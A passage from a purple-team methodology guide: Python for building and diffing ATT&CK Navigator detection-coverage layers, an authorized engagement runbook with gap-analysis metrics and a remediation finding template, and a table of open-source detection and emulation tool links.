        {"techniqueID": "T1053.005", "tactic": "persistence", "score": 3,
         "comment": "Scheduled task creation monitored via Sysmon"},
        {"techniqueID": "T1055.001", "tactic": "defense-evasion", "score": 1,
         "comment": "Sysmon Event 8 collected, no rule written"},
        {"techniqueID": "T1003.001", "tactic": "credential-access", "score": 5,
         "comment": "LSASS access rule validated + evasion-tested"},
    ]

    layer = create_layer(
        name="Purple Team Coverage - Q1 2026",
        techniques=detections,
        description="Post-engagement detection coverage assessment",
    )
    save_layer(layer, "purple_team_coverage.json")

Layer Workflow for Purple Team

PRE-ENGAGEMENT:
  1. Export current detection rules
  2. Map rules to ATT&CK technique IDs
  3. Generate "current state" layer (baseline)
  4. Generate "threat actor" layer (techniques to test)
  5. Overlay layers in Navigator to see coverage vs. threat

POST-ENGAGEMENT:
  1. Update technique scores based on test results
  2. Generate "post-engagement" layer
  3. Diff baseline vs. post-engagement
  4. Highlight new gaps discovered
  5. Prioritize remediation backlog

ONGOING:
  - Regenerate layer monthly from detection inventory
  - Track coverage percentage trends
  - Compare against evolving threat landscape
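The baseline vs. post-engagement diff reduces to a score comparison keyed on technique ID. A sketch compatible with the layer format in this section:

```python
def diff_layers(baseline: dict, post: dict) -> dict:
    """Per-technique score changes between two Navigator layers."""
    def scores(layer):
        return {t["techniqueID"]: t.get("score", 0)
                for t in layer.get("techniques", [])}
    before, after = scores(baseline), scores(post)
    return {
        "improved":  {t: (before[t], s) for t, s in after.items()
                      if t in before and s > before[t]},
        "regressed": {t: (before[t], s) for t, s in after.items()
                      if t in before and s < before[t]},
        # techniques first scored in this engagement, still below Validated
        "new_gaps":  [t for t, s in after.items()
                      if t not in before and s < 3],
    }

baseline = {"techniques": [{"techniqueID": "T1059.001", "score": 2}]}
post = {"techniques": [{"techniqueID": "T1059.001", "score": 4},
                       {"techniqueID": "T1055.001", "score": 1}]}
print(diff_layers(baseline, post))
```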

7. Purple Team Engagement Runbook

Pre-Engagement Phase (1-2 Weeks Before)

STEP 1: SCOPE DEFINITION
  [ ] Define engagement objectives (specific questions to answer)
  [ ] Select threat actor(s) or technique set for emulation
  [ ] Identify in-scope systems, networks, and data
  [ ] Define rules of engagement (RoE):
      - Hours of operation
      - Excluded systems (production databases, safety systems)
      - Communication channels and escalation paths
      - Emergency stop procedures
  [ ] Obtain written authorization from system owners
  [ ] Brief SOC team (level of awareness: full knowledge / partial / blind)

STEP 2: THREAT INTELLIGENCE GATHERING
  [ ] Pull ATT&CK profile for selected threat actor(s)
  [ ] Review CTID emulation plan (if available)
  [ ] Identify applicable Atomic Red Team tests for each technique
  [ ] Supplement with SCYTHE community threats / custom procedures
  [ ] Build ATT&CK Navigator "threat actor" layer

STEP 3: DETECTION BASELINE
  [ ] Export current SIEM rules and map to ATT&CK
  [ ] Generate "current coverage" Navigator layer
  [ ] Overlay with threat actor layer — identify expected gaps
  [ ] Document detection hypotheses:
      "We EXPECT to detect T1059.001 via rule XYZ"
      "We DO NOT EXPECT to detect T1055.003 (no data source)"
  [ ] Ensure logging infrastructure is healthy:
      - Sysmon running and forwarding (verify with test event)
      - SIEM ingestion pipeline clear (check lag/backlog)
      - Endpoint agents reporting

STEP 4: LAB VALIDATION (Optional but Recommended)
  [ ] Run planned Atomic tests in lab environment first
  [ ] Verify tests produce expected artifacts
  [ ] Confirm cleanup procedures work
  [ ] Validate detection rules fire in lab

Execution Phase

STEP 5: EXECUTE EMULATION PLAN
  For each technique in the plan:

  RED TEAM (or automated):
    [ ] Announce technique ID to purple team coordinator
    [ ] Execute Atomic Red Team test (or manual procedure)
    [ ] Record:
        - Timestamp (UTC)
        - Technique ID + test number
        - Source host and user context
        - Exact command(s) executed
        - Observed outcome (success/failure/partial)
    [ ] Wait designated observation window (5-15 minutes)

  BLUE TEAM (simultaneously or after window):
    [ ] Check SIEM for alerts triggered by the technique
    [ ] Search raw logs for expected artifacts
    [ ] Record:
        - Alert fired? (yes/no/partial)
        - Time to detect (TTD) — execution timestamp to alert
        - Data source that captured the activity
        - Missing telemetry (expected event not present)
    [ ] If no detection: attempt manual hunt
        - What query would find this?
        - What data source is missing?

  COORDINATOR:
    [ ] Log result in engagement tracker:

    | Time (UTC)  | Technique    | Test         | Detected | TTD    | Rule         | Notes         |
    |-------------|--------------|--------------|----------|--------|--------------|---------------|
    | 14:32:00    | T1059.001-1  | ART #1       | YES      | 45s    | PS_Exec_01   | As expected   |
    | 14:47:00    | T1055.001-1  | ART #2       | NO       | N/A    | None         | No Event 8    |

    [ ] After each technique: brief discussion (2-3 min max)
    [ ] Run cleanup before next technique
    [ ] Proceed to next technique in plan

Post-Engagement Phase

STEP 6: GAP ANALYSIS
  [ ] Compile all results into detection coverage matrix
  [ ] Calculate metrics:
      - Detection rate: (techniques detected / techniques tested) * 100
      - Mean time to detect (MTTD) across all detected techniques
      - Coverage by tactic (which kill chain phases are weakest?)
      - Data source gaps (what telemetry is missing?)
  [ ] Generate post-engagement Navigator layer
  [ ] Diff pre vs. post layers
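The Step 6 metrics can be computed directly from the tracker. A sketch with hypothetical sample results (tuples of technique ID, tactic, detected flag, and TTD in seconds):

```python
from statistics import mean

# Hypothetical engagement results: (technique_id, tactic, detected, ttd_seconds)
results = [
    ("T1059.001", "execution",         True,  45),
    ("T1055.001", "defense-evasion",   False, None),
    ("T1003.001", "credential-access", True,  120),
]

detected = [r for r in results if r[2]]
detection_rate = 100 * len(detected) / len(results)   # (detected / tested) * 100
mttd = mean(r[3] for r in detected)                   # mean TTD over detections only

# Coverage by tactic: (tested, detected) per kill chain phase
by_tactic = {}
for _, tactic, hit, _ in results:
    tested, found = by_tactic.get(tactic, (0, 0))
    by_tactic[tactic] = (tested + 1, found + (1 if hit else 0))

print(f"Detection rate: {detection_rate:.0f}%")   # 67%
print(f"MTTD: {mttd:.1f}s")                       # 82.5s
```

Note that MTTD is averaged only over detected techniques; missed techniques surface in the detection rate and the per-tactic breakdown instead.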

STEP 7: REMEDIATION PLANNING
  For each gap, produce a finding:

  [GAP-001]
  Technique  : T1055.001 — Process Injection: DLL Injection
  Test       : Atomic Red Team T1055.001-1
  Result     : NOT DETECTED
  Root Cause : Sysmon Event 8 (CreateRemoteThread) not enabled in config
  Remediation:
    1. Add CreateRemoteThread monitoring to Sysmon config
    2. Write Sigma rule for suspicious CreateRemoteThread targets
    3. Validate with ART test T1055.001-1
    4. Document as ADS with blind spots
  Priority   : HIGH (credential access dependency)
  Owner      : Detection Engineering
  Target Date: [date]
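Gap findings in this format sort cleanly into a remediation backlog. A minimal sketch, assuming findings are kept as dicts mirroring the template fields above (the sample findings are hypothetical):

```python
# Rank order for the Priority field in the gap finding template.
PRIORITY_RANK = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}

findings = [
    {"id": "GAP-002", "technique": "T1003.001", "priority": "MEDIUM",
     "root_cause": "Data source present, no rule", "owner": "Detection Engineering"},
    {"id": "GAP-001", "technique": "T1055.001", "priority": "HIGH",
     "root_cause": "Missing data source (Sysmon Event 8)", "owner": "Detection Engineering"},
]

# Highest priority first; finding ID breaks ties deterministically.
backlog = sorted(findings, key=lambda f: (PRIORITY_RANK[f["priority"]], f["id"]))
for f in backlog:
    print(f"[{f['id']}] {f['technique']} ({f['priority']}): {f['root_cause']}")
```

The same records feed Section 5 of the report (Remediation Roadmap) once owners and target dates are attached.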

STEP 8: REPORT
  Purple Team Engagement Report Structure:

  1. Executive Summary
     - Engagement dates, scope, threat actor emulated
     - Detection rate (headline metric)
     - Top 3 critical gaps

  2. Methodology
     - Emulation plan reference
     - Tools used (Atomic Red Team, custom procedures)
     - Environment (production / lab / hybrid)

  3. Results Matrix
     - Full technique-by-technique results table
     - Navigator layer screenshots (before/after)

  4. Gap Analysis
     - Gaps by tactic
     - Root cause categorization:
         - Missing data source
         - Data source present, no rule
         - Rule present, not working
         - Rule working, too noisy (disabled)
     - Detection coverage trend (if repeat engagement)

  5. Remediation Roadmap
     - Prioritized gap findings with owners and dates
     - Quick wins (< 1 week)
     - Medium-term (1-4 weeks)
     - Strategic (requires infrastructure changes)

  6. Appendices
     - Full execution log with timestamps
     - Navigator layer JSON files
     - New/updated Sigma rules produced
     - ADS documents for new detections

STEP 9: FOLLOW-UP
  [ ] Track remediation items to completion
  [ ] Re-test remediated gaps (targeted validation)
  [ ] Update coverage Navigator layer
  [ ] Schedule next engagement (quarterly recommended)
  [ ] Feed findings into detection engineering backlog
  [ ] Update threat model with new intelligence

Purple Team Cadence

CONTINUOUS (Automated):
  - Weekly Atomic Red Team sweeps against critical techniques
  - Automated: execute test -> query SIEM -> assert detection
  - Alert on detection regression (previously detected, now missed)
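The continuous sweep loop (execute test -> query SIEM -> assert detection) can be sketched as below. `run_atomic_test` and `query_siem_alerts` are hypothetical stand-ins for an Invoke-AtomicRedTeam wrapper and your SIEM's search API; the baseline dict records the previous sweep's detection status so regressions can be flagged:

```python
import time

def run_atomic_test(technique: str, test_number: int) -> float:
    """Execute the Atomic test and return the UTC epoch of execution.
    Placeholder: a real version shells out to Invoke-AtomicRedTeam."""
    return time.time()

def query_siem_alerts(technique: str, since_epoch: float) -> list:
    """Return alerts referencing the technique since the execution timestamp.
    Placeholder: a real version calls your SIEM's search API."""
    return []

# Detection status from the previous sweep (technique -> was detected).
BASELINE = {"T1059.001": True, "T1055.001": False}

def sweep(techniques):
    regressions = []
    for tid in techniques:
        executed = run_atomic_test(tid, 1)
        # A real version sleeps here for the 5-15 minute observation window.
        alerts = query_siem_alerts(tid, since_epoch=executed)
        detected = len(alerts) > 0
        if BASELINE.get(tid) and not detected:
            regressions.append(tid)  # previously detected, now missed -> raise alert
    return regressions
```

With the placeholder SIEM query returning no alerts, `sweep(["T1059.001", "T1055.001"])` flags `T1059.001` as a regression, since the baseline marks it as previously detected.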

QUARTERLY (Manual):
  - Full purple team engagement against selected threat actor
  - Update coverage baseline
  - Remediation sprint

ANNUAL:
  - Comprehensive ATT&CK coverage assessment
  - Full threat landscape re-evaluation
  - Strategic detection roadmap update

Reference: Key Tool Links

| Tool | Purpose | URL |
|------|---------|-----|
| Atomic Red Team | Test library by ATT&CK technique | https://github.com/redcanaryco/atomic-red-team |
| Invoke-AtomicRedTeam | PowerShell execution framework | https://github.com/redcanaryco/invoke-atomicredteam |
| CTID Emulation Library | Full adversary emulation plans | https://github.com/center-for-threat-informed-defense/adversary_emulation_library |
| ATT&CK Navigator | Visual coverage mapping | https://github.com/mitre-attack/attack-navigator |
| sysmon-modular | Composable Sysmon configs | https://github.com/olafhartong/sysmon-modular |
| sysmon-config | Baseline Sysmon config | https://github.com/SwiftOnSecurity/sysmon-config |
| Palantir ADS Framework | Detection documentation standard | https://github.com/palantir/alerting-detection-strategy-framework |
| HELK | Hunting ELK platform | https://github.com/Cyb3rWard0g/HELK |
| Splunk Attack Range | Cloud-based attack simulation lab | https://github.com/splunk/attack_range |
| Sigma | Vendor-agnostic detection rules | https://github.com/SigmaHQ/sigma |
| MITRE D3FEND | Defensive countermeasure knowledge graph | https://d3fend.mitre.org |
| TonyPhipps/SIEM | SIEM resources and detection references | https://github.com/TonyPhipps/SIEM |
| awesome-detection-engineering | Curated detection engineering resources | https://github.com/infosecB/awesome-detection-engineering |